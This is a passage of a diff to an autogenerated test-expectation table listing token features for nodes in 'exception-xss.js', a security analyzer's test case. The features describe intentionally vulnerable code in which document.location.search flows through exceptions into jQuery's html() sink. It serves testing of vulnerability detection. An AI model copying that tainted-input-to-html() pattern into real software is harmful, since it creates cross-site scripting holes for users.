tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:167:5:167:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:167:5:167:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:167:5:167:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19310,6 +130541,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:167:5:167:10 | 'myId' | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:167:5:167:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:167:5:167:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:13:167:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:13:167:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:13:167:16 | html | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:13:167:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:13:167:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:167:18:167:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:167:18:167:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:167:18:167:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19317,6 +130553,79 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:167:18:167:18 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:167:18:167:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:167:18:167:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:170:1 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:170:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:170:1 | this | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:170:1 | this | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:170:1 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | 'arguments' object of function inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | 'arguments' object of function inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | 'arguments' object of function inner | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | 'arguments' object of function inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | 'arguments' object of function inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | exceptional return of function inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | exceptional return of function inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | exceptional return of function inner | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | exceptional return of function inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | exceptional return of function inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | functio ... ve);\\n\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | functio ... ve);\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | functio ... ve);\\n\\t} | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | functio ... ve);\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | functio ... ve);\\n\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | return of function inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | return of function inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | return of function inner | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | return of function inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:2:172:2 | return of function inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | contextSurroundingFunctionParameters | (tainted, resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:11:170:15 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:17:170:23 | tainted | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:17:170:23 | tainted | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:17:170:23 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:17:170:23 | tainted | contextSurroundingFunctionParameters | (tainted, resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:17:170:23 | tainted | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:17:170:23 | tainted | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:17:170:23 | tainted | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:17:170:23 | tainted | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:17:170:23 | tainted | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:17:170:23 | tainted | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:26:170:32 | resolve | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:26:170:32 | resolve | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:26:170:32 | resolve | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:26:170:32 | resolve | contextSurroundingFunctionParameters | (tainted, resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:26:170:32 | resolve | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:26:170:32 | resolve | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:26:170:32 | resolve | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:26:170:32 | resolve | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:26:170:32 | resolve | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:170:26:170:32 | resolve | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:9 | unknown | contextSurroundingFunctionParameters | (tainted, resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:9 | unknown | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:9 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:27 | exceptional return of unknown ... esolve) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:27 | exceptional return of unknown ... esolve) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:27 | exceptional return of unknown ... esolve) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:27 | exceptional return of unknown ... esolve) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:27 | exceptional return of unknown ... esolve) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:27 | unknown ... esolve) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:27 | unknown ... esolve) | contextSurroundingFunctionParameters | (tainted, resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:27 | unknown ... esolve) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:27 | unknown ... esolve) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:171:3:171:27 | unknown ... esolve) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:171:11:171:17 | tainted | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:171:11:171:17 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:171:11:171:17 | tainted | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19331,6 +130640,117 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:171:20:171:26 | resolve | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:171:20:171:26 | resolve | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:171:20:171:26 | resolve | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:44 | exceptional return of new Pro ... solve)) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:44 | exceptional return of new Pro ... solve)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:44 | exceptional return of new Pro ... solve)) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:44 | exceptional return of new Pro ... solve)) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:44 | exceptional return of new Pro ... solve)) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:44 | new Pro ... solve)) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:44 | new Pro ... solve)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:44 | new Pro ... solve)) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:44 | new Pro ... solve)) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:44 | new Pro ... solve)) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:50 | new Pro ... ).catch | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:50 | new Pro ... ).catch | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:50 | new Pro ... ).catch | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:50 | new Pro ... ).catch | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:174:50 | new Pro ... ).catch | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:176:3 | exceptional return of new Pro ... OK\\n\\t}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:176:3 | exceptional return of new Pro ... OK\\n\\t}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:176:3 | exceptional return of new Pro ... OK\\n\\t}) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:176:3 | exceptional return of new Pro ... OK\\n\\t}) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:176:3 | exceptional return of new Pro ... OK\\n\\t}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:176:3 | new Pro ... OK\\n\\t}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:176:3 | new Pro ... OK\\n\\t}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:176:3 | new Pro ... OK\\n\\t}) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:176:3 | new Pro ... OK\\n\\t}) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:2:176:3 | new Pro ... OK\\n\\t}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:6:174:12 | Promise | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:6:174:12 | Promise | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:6:174:12 | Promise | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:6:174:12 | Promise | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:6:174:12 | Promise | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:13 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:13 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:13 | foo | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:13 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:13 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:13 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:13 | inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:13 | inner | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:13 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:13 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:20 | resolve | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:20 | resolve | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:20 | resolve | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:20 | resolve | contextSurroundingFunctionParameters | ()\n(resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:20 | resolve | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:20 | resolve | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:20 | resolve | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:20 | resolve | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:20 | resolve | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:20 | resolve | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | 'arguments' object of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | 'arguments' object of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | exceptional return of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | exceptional return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | resolve ... esolve) | CalleeFlexibleAccessPath | Promise | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | resolve ... esolve) | InputArgumentIndex | 0 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | resolve ... esolve) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | resolve ... esolve) | contextSurroundingFunctionParameters | ()\n(resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | resolve ... esolve) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | resolve ... esolve) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | resolve ... esolve) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | return of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:14:174:43 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:29 | inner | contextFunctionInterfaces | 